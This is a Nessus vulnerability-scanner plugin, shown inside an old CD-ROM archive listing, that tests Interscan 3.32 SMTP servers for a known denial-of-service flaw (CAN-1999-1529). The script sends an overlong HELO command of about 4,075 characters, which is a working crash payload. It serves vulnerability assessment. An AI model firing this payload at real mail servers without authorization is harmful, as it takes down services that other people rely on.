home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / interscan_dos.nasl

< prev

next >

Wrap

Text File  |  2005-01-14  |  3KB  |  98 lines

---

1. #
2. # This script was written by Alain Thivillon <Alain.Thivillon@hsc.fr>
3. #
4. # Script audit and contributions from Carmichael Security <http://www.carmichaelsecurity.com>
5. #      Erik Anderson <eanders@carmichaelsecurity.com>
6. #      Added BugtraqID and CVE
7. #
8. # See the Nessus Scripts License for details
9. #
10.  
11. if(description)
12. {
13.  script_id(10353);
14.  script_bugtraq_id(787);
15.  script_version ("$Revision: 1.15 $");
16.  script_cve_id("CAN-1999-1529");
17.  name["english"] = "Interscan 3.32 SMTP Denial";
18.  name["francais"] = "DΘni de service contre le serveur SMTP Interscan 3.32";
19.  script_name(english:name["english"], francais:name["francais"]);
20.  
21.  desc["english"] = "It was possible to perform
22. a denial of service against the remote
23. Interscan SMTP server by sending it a special long HELO command. 
24.  
25. This problem allows an attacker to prevent
26. your Interscan SMTP server from handling requests.
27.  
28. Solution : contact your vendor for a patch.
29.  
30. Risk factor : High";
31.  
32.  desc["francais"] = "Il s'est avΘrΘ possible
33. de crΘer un dΘni de service sur le serveur
34. SMTP Interscan distant en lui envoyant une commande HELO
35. longue
36.  
37. Un pirate peut utiliser ce problΦme
38. pour empecher votre serveur de traiter
39. les requetes SMTP.
40.  
41. Solution : contactez votre vendeur pour un
42. patch.
43.  
44. Facteur de risque : ElevΘ";
45.  
46.  
47.  script_description(english:desc["english"], francais:desc["francais"]);
48.  
49.  summary["english"] = "Crashes the Interscan NT SMTP Server";
50.  summary["francais"] = "Fait planter le serveur SMTP Interscan NT";
51.  script_summary(english:summary["english"], francais:summary["francais"]);
52.  
53.  script_category(ACT_DENIAL);
54.  
55.  
56.  script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison and Alain Thivillon",
57.         francais:"Ce script est Copyright (C) 2000 Renaud Deraison et Alain Thivillon");
58.  family["english"] = "Denial of Service";
59.  family["francais"] = "DΘni de service";
60.  script_family(english:family["english"], francais:family["francais"]);
61.  script_dependencie("find_service.nes");
62.  script_require_ports("Services/smtp", 25);
63.  exit(0);
64. }
65.  
66. #
67. # The script code starts here
68. #
69.  
70. include("smtp_func.inc");
71.  
72. port = get_kb_item("Services/smtp");
73. if(!port)port = 25;
74. if(!get_port_state(port))exit(0);
75.  
76.  soc = open_sock_tcp(port);
77.  if(soc)
78.  {
79.    s = smtp_recv_banner(socket:soc);
80.    if(s)
81.    {
82.    c = string("HELO a\r\n");
83.    send(socket:soc, data:c);
84.    s = recv_line(socket:soc, length:5000);
85.    if(!s)exit(0);
86.    c = string("HELO ", crap(length:4075, data:"."),"\r\n");
87.    send(socket:soc, data:c);
88.    s = recv_line(socket:soc, length:5000);
89.    if(!s) { security_hole(port); exit(0) ; }
90.    c = string("HELO a\r\n");
91.    send(socket:soc, data:c);
92.    s = recv_line(socket:soc, length:2048, timeout:20);
93.    if(!s) { security_hole(port); exit(0); }
94.    }
95.    close(soc);
96.  }
97.     
98.